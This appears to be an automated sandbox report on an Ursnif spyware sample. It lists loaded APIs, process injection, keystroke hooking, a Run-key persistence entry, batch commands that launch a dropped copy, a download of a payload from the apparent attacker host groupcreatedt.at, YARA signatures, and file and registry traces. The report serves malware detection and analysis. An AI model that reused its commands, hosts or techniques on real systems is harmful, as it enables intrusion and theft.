DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/GetWindowLongPtrA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/SetWindowLongPtrA
DynamicLoader: USER32.dll/SetClipboardViewer
DynamicLoader: USER32.dll/IsClipboardFormatAvailable
DynamicLoader: USER32.dll/GetClipboardOwner
DynamicLoader: USER32.dll/RegisterDeviceNotificationA
DynamicLoader: USER32.dll/GetMessageA
DynamicLoader: WS2_32.dll/
DynamicLoader: ncrypt.dll/SslDecrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
Encrypts a single HTTP packet
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
Reads data out of its own binary image
self_read: process: LjejZswGjULF7Ng.exe, pid: 420, offset: 0x00000000, length: 0x0004ea00
A process created a hidden window
Process: LjejZswGjULF7Ng.exe -> C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
CAPE extracted potentially suspicious content
LjejZswGjULF7Ng.exe: Extracted Shellcode
LjejZswGjULF7Ng.exe: Extracted PE Image: 32-bit executable
LjejZswGjULF7Ng.exe: Extracted PE Image: 32-bit executable
explorer.exe: Ursnif Payload: 64-bit DLL
explorer.exe: [{u'strings': [u'{ 41 8B 02 FF C1 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D9 }', u'{ 44 8B D9 33 C0 45 33 C9 44 33 1D 2D B9 01 00 4C 8B D2 48 85 D2 74 37 4C 8D 42 10 45 3B 0A 73 2E 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12 }'], u'meta': {u'cape_type': u'Ursnif Payload', u'description': u'Ursnif Payload', u'author': u'kevoreilly & enzo'}, u'addresses': {u'decrypt_config64': 125588L, u'crypto64_1': 171678L}, u'name': u'Ursnif'}]
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit executable
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.php.net/license/3_0.txt
suspicious_request: http://groupcreatedt.at/key/x64.bin
Performs some HTTP requests
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00045a00, virtual_size: 0x00045910
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
Uses Windows utilities for basic functionality
command: C:\Users\user\AppData\Local\Temp\E502\D8E1.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
Queries information on disks for anti-virtualization via Device Information APIs
Behavioural detection: Injection (Process Hollowing)
Injection: corrawex.exe(2512) -> svchost.exe(2152)
Executed a process and injected code into it, probably while unpacking
Injection: corrawex.exe(2512) -> svchost.exe(2152)
Deletes its original binary from disk
Sniffs keystrokes
SetWindowsHookExA: Process: explorer.exe(1632)
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
A system process is generating network traffic likely as a result of process injection
network_connection: explorer.exe_WSASend_get /license/3_0.txt http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: www.php.net
network_connection: explorer.exe_WSASend_get /key/x64.bin http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: groupcreatedt.at
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00n\x01\x00\x00j\x03\x01^y\xd7v>\x82\x89\xc2\xadw`d\xe8k\xb3\xe1\x08l 9\x06\xfa\xbfz\xc234\xb0\x92\xeb\xed+\x00\x00\x18\x00/\x005\x00\x05\x00 \xc0\x13\xc0\x14\xc0 \xc0 \x002\x008\x00\x13\x00\x04\x01\x00\x00)\xff\x01\x00\x01\x00\x00\x00\x00\x10\x00\x0e\x00\x00\x0bwww.php.net\x00 \x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00f\x10\x00\x00ba\x04\x94\xbc\xafi\x82y\x83\x0c \xdda\xbfx\xd6s\xd2\x97\xf0i#\xce\xb2\xe49\xe0\xb3\xb4\x05\xed\x98&\x80\x08\xfa \x92rq\x0cb\xcbb]\x95x\x0bg\xb9 \x11n\xf4#\xeb\x8e\xca\x0e\xb4=\x9a\xaau\xc2:\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000&\xf4*b\x06\xca\x03\xad!\x01\xbe3\xce\xc9\x17\x9c\xb3 \xa7\x8fq\xbf-\xa95@\xc2\xeb\xad\xdfc\xe2\x8b\xf4c\xdb6\x01\xceu*s\x02\x10\xc1'n^
network_connection: explorer.exe_WSASend_get /msdownload/update/v3/static/trustedr/en/authrootstl.cab http/1.1 cache-control: max-age = 3600 connection: keep-alive accept: */* if-modified-since: wed, 26 feb 2020 21:39:14 gmt if-none-match: "06d5b30edecd51:0" user-agent: microsoft-cryptoapi/
network_connection: explorer.exe_WSASend_\x17\x03\x01\x00\x90\x1f=\x08\x86\xb4\xc6\xc4\xe3u\xa6\xf1\x8e\x91\x05\xa1\xcej\x97\xd0\x7f\xd1\xf4\x1f\xcc\xa5\x98\x0e\xca\xe9\xb3xg\xd3t\x8c\xd3_\xe8$\x8a\x0c\xdf\xaa\xcbr>\xeb}t\xdf\x11n\xb2\xc6\xf5\xed\x94lno\xe4[\xce\xf6#\xf7\xb7\xe9e,\x95m\x96*\x10\xee\xa9 \x0f>\xe1(\xb8]\xf5\xa4\x9b\x1ey7y\x9b\xfc\xd6\x05x.\xe2\x8c\xe5\xf1\xb7\x151bl\xb5\xe0\xea&\xf9\xef\x1e\x1d\x19u\xb4\xd7\xb0\xb6\xdap>q/\x16\x07\x1f/\x80\x06\x83\x88\xc1\xb27\xe1\x19u+-&\xa7\x13
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Exhibits behavior characteristics of Ursnif spyware
CAPE detected the Ursnif malware family
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Creates a slightly modified copy of itself
file: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
percent_match: 99

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.202.161.73 [VT] United States
N 192.42.116.41 [VT] Netherlands
N 185.85.0.29 [VT] Germany
N 152.195.11.6 [VT] United States

DNS

Name Response Post-Analysis Lookup
www.php.net [VT] A 185.85.0.29 [VT]
CNAME www-php-net.ax4z.com [VT]
www.download.windowsupdate.com [VT] A 152.195.11.6 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME wu.ec.azureedge.net [VT]
CNAME wu.wpc.apr-52dd2.edgecastdns.net [VT]
CNAME cs611.wpc.edgecastcdn.net [VT]
CNAME wu.azureedge.net [VT]
www.microsoft.com [VT] CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
CNAME e13678.dspb.akamaiedge.net [VT]
CNAME www.microsoft.com-c-3.edgekey.net [VT]
A 23.202.161.73 [VT]
groupcreatedt.at [VT] A 192.42.116.41 [VT]

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Windows\sysnative\*.dll
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\E502
C:\Users\user\AppData\Local\Temp\E502\D8E1.tmp
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\E502\D8E1.bat"
C:\Users\user\AppData\Local\Temp\cmd.*
C:\Users\user\AppData\Local\Temp\cmd
C:\Windows\System32\cmd.*
C:\Windows\System32\cmd.COM
C:\Windows\System32\cmd.exe
C:\
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming
C:\Windows\sysnative\p2pcollab.dll
C:\Windows\sysnative\QAGENTRT.DLL
C:\Windows\sysnative\dnsapi.dll
C:\Windows\sysnative\fveui.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Windows\sysnative\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Windows\sysnative\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Windows\sysnative\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
C:\Windows\sysnative\CabA20F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\E502\D8E1.tmp
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_USERS\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\LjejZswGjULF7Ng.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
